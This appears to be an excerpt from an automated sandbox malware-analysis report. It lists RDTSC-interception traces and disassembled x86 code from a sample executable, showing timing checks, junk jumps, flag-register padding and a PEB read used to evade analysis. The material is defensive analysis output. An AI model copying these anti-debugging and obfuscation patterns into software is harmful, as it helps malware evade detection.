Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703032C second address: 7030330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030330 second address: 7030368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007F3E51171E77h 0x0000000e xchg eax, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3E51171E75h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030368 second address: 70303E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3E511046B7h 0x00000011 sbb cx, 8FCEh 0x00000016 jmp 00007F3E511046B9h 0x0000001b popfd 0x0000001c movzx eax, dx 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push esi 0x00000025 pop edx 0x00000026 pushfd 0x00000027 jmp 00007F3E511046B0h 0x0000002c or eax, 2D579B78h 0x00000032 jmp 00007F3E511046ABh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70303E4 second address: 703045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F3E51171E73h 0x00000014 sub si, D89Eh 0x00000019 jmp 00007F3E51171E79h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F3E51171E70h 0x00000025 or eax, 62517A98h 0x0000002b jmp 00007F3E51171E6Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703045D second address: 703048F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3E511046ADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703048F second address: 703049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E51171E6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703049F second address: 70304CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3E511046B5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70304CA second address: 70304D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030506 second address: 703050C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703050C second address: 7030510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030510 second address: 7030550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F3E511046AFh 0x0000000f je 00007F3EC0313825h 0x00000015 jmp 00007F3E511046B6h 0x0000001a sub eax, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movzx esi, dx 0x00000022 mov ecx, ebx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030550 second address: 703057F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3E51171E77h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703057F second address: 70305A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F3E511046B6h 0x00000015 pop esi 0x00000016 mov ecx, edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70305A9 second address: 7030625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f mov ah, 4Ah 0x00000011 popad 0x00000012 mov dword ptr [esi+0Ch], eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F3E51171E71h 0x0000001d and esi, 0DEA4746h 0x00000023 jmp 00007F3E51171E71h 0x00000028 popfd 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c mov dl, cl 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+4Ch] 0x00000032 pushad 0x00000033 mov edi, 667890DAh 0x00000038 mov eax, ebx 0x0000003a popad 0x0000003b mov dword ptr [esi+10h], eax 0x0000003e jmp 00007F3E51171E6Dh 0x00000043 mov eax, dword ptr [ebx+50h] 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F3E51171E6Dh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030625 second address: 7030635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030635 second address: 7030639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030639 second address: 7030678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F3E511046B8h 0x00000014 jmp 00007F3E511046B5h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030678 second address: 703067D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703067D second address: 703068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703068B second address: 70306D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b jmp 00007F3E51171E77h 0x00000010 mov dword ptr [esi+18h], eax 0x00000013 pushad 0x00000014 mov esi, 3F408A7Bh 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d mov eax, dword ptr [ebx+58h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3E51171E74h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70306D5 second address: 70306E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70306E4 second address: 703070D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c pushad 0x0000000d mov ecx, 74EE25B3h 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70307F2 second address: 70307F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70307F8 second address: 70307FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70307FC second address: 7030813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+68h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3E511046AAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030813 second address: 703086A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c jmp 00007F3E51171E76h 0x00000011 mov ax, word ptr [ebx+6Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F3E51171E6Dh 0x0000001e and si, A3F6h 0x00000023 jmp 00007F3E51171E71h 0x00000028 popfd 0x00000029 push eax 0x0000002a pop edi 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703086A second address: 70308AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F3E511046AEh 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 jmp 00007F3E511046B0h 0x0000001e mov word ptr [esi+32h], ax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70308AE second address: 70308B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70308B2 second address: 70308CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70308CF second address: 7030990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F3E51171E6Dh 0x0000000b sbb esi, 47F9E2C6h 0x00000011 jmp 00007F3E51171E71h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+0000008Ch] 0x00000020 pushad 0x00000021 jmp 00007F3E51171E6Ch 0x00000026 mov esi, 4BE64381h 0x0000002b popad 0x0000002c mov dword ptr [esi+34h], eax 0x0000002f jmp 00007F3E51171E6Ch 0x00000034 mov eax, dword ptr [ebx+18h] 0x00000037 jmp 00007F3E51171E70h 0x0000003c mov dword ptr [esi+38h], eax 0x0000003f pushad 0x00000040 call 00007F3E51171E6Ah 0x00000045 mov ax, D9D1h 0x00000049 pop esi 0x0000004a popad 0x0000004b mov eax, dword ptr [ebx+1Ch] 0x0000004e jmp 00007F3E51171E6Dh 0x00000053 mov dword ptr [esi+3Ch], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F3E51171E6Fh 0x0000005f sbb cl, 0000006Eh 0x00000062 jmp 00007F3E51171E79h 0x00000067 popfd 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030990 second address: 7030996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030996 second address: 703099A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703099A second address: 70309AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70309AA second address: 70309D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3E51171E6Eh 0x0000000a jmp 00007F3E51171E75h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70309D4 second address: 70309E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70309E4 second address: 70309F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ecx, ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70309F4 second address: 7030A46 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3E511046AFh 0x00000008 or cl, 0000003Eh 0x0000000b jmp 00007F3E511046B9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ah, C1h 0x00000015 popad 0x00000016 lea eax, dword ptr [ebx+00000080h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3E511046B6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030A46 second address: 7030AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3E51171E74h 0x00000012 adc esi, 79DD58C8h 0x00000018 jmp 00007F3E51171E6Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F3E51171E78h 0x00000024 add si, DB28h 0x00000029 jmp 00007F3E51171E6Bh 0x0000002e popfd 0x0000002f popad 0x00000030 nop 0x00000031 pushad 0x00000032 jmp 00007F3E51171E74h 0x00000037 pushfd 0x00000038 jmp 00007F3E51171E72h 0x0000003d add ax, E8B8h 0x00000042 jmp 00007F3E51171E6Bh 0x00000047 popfd 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030AEE second address: 7030B3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3E511046ABh 0x00000013 and ecx, 2C8D9FDEh 0x00000019 jmp 00007F3E511046B9h 0x0000001e popfd 0x0000001f mov eax, 249F92A7h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030B3F second address: 7030BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E51171E73h 0x00000009 sub cl, FFFFFFEEh 0x0000000c jmp 00007F3E51171E79h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F3E51171E70h 0x00000018 or cl, 00000068h 0x0000001b jmp 00007F3E51171E6Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 lea eax, dword ptr [ebp-10h] 0x00000027 jmp 00007F3E51171E76h 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov bl, 2Bh 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030BB8 second address: 7030BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030C44 second address: 7030C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030C48 second address: 7030C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030C5B second address: 7030C94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6A8AEE9Ah 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test edi, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, eax 0x00000014 pushfd 0x00000015 jmp 00007F3E51171E72h 0x0000001a add si, 0A08h 0x0000001f jmp 00007F3E51171E6Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030C94 second address: 7030CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030CAC second address: 7030CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F3EC0380875h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3E51171E6Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030CC6 second address: 7030D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [ebp-0Ch] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, E686h 0x00000010 pushfd 0x00000011 jmp 00007F3E511046B7h 0x00000016 sbb ecx, 545A7D0Eh 0x0000001c jmp 00007F3E511046B9h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030D0F second address: 7030DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d call 00007F3E51171E6Ch 0x00000012 mov ebx, eax 0x00000014 pop ecx 0x00000015 mov bx, F582h 0x00000019 popad 0x0000001a lea eax, dword ptr [ebx+78h] 0x0000001d pushad 0x0000001e call 00007F3E51171E6Fh 0x00000023 pushfd 0x00000024 jmp 00007F3E51171E78h 0x00000029 sbb ax, 2848h 0x0000002e jmp 00007F3E51171E6Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 movsx ebx, ax 0x00000038 popad 0x00000039 push 00000001h 0x0000003b jmp 00007F3E51171E70h 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F3E51171E6Dh 0x0000004a adc cx, 7416h 0x0000004f jmp 00007F3E51171E71h 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007F3E51171E70h 0x0000005b and si, 1838h 0x00000060 jmp 00007F3E51171E6Bh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030DDC second address: 7030E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, cx 0x0000000e pushfd 0x0000000f jmp 00007F3E511046B8h 0x00000014 and ch, FFFFFFF8h 0x00000017 jmp 00007F3E511046ABh 0x0000001c popfd 0x0000001d popad 0x0000001e nop 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007F3E511046B2h 0x00000028 and si, 1758h 0x0000002d jmp 00007F3E511046ABh 0x00000032 popfd 0x00000033 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030E4F second address: 7030E7B instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 mov ecx, 7E8CA607h 0x0000000d pop eax 0x0000000e popad 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 jmp 00007F3E51171E73h 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030E7B second address: 7030E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030E7F second address: 7030E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030EFC second address: 7030F42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F3E511046B0h 0x00000010 test edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ch, dh 0x00000017 jmp 00007F3E511046B6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030F42 second address: 7030F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F3EC03805CEh 0x0000000f pushad 0x00000010 mov esi, 3E90D14Bh 0x00000015 mov ax, 3727h 0x00000019 popad 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3E51171E79h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030F80 second address: 7030FD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F3E511046B3h 0x00000015 add si, B67Eh 0x0000001a jmp 00007F3E511046B9h 0x0000001f popfd 0x00000020 push esi 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030FD1 second address: 7031074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F3E51171E6Eh 0x00000011 push 00000001h 0x00000013 jmp 00007F3E51171E70h 0x00000018 nop 0x00000019 pushad 0x0000001a push eax 0x0000001b pushfd 0x0000001c jmp 00007F3E51171E6Dh 0x00000021 add eax, 181E24C6h 0x00000027 jmp 00007F3E51171E71h 0x0000002c popfd 0x0000002d pop eax 0x0000002e pushfd 0x0000002f jmp 00007F3E51171E71h 0x00000034 sub si, 7E26h 0x00000039 jmp 00007F3E51171E71h 0x0000003e popfd 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007F3E51171E71h 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a mov cx, A755h 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031160 second address: 7031165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031165 second address: 7031185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031185 second address: 70311A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70311A2 second address: 70311A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70311A9 second address: 70311BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F3EC0312BA5h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70311BB second address: 70311C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70311C1 second address: 70311C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
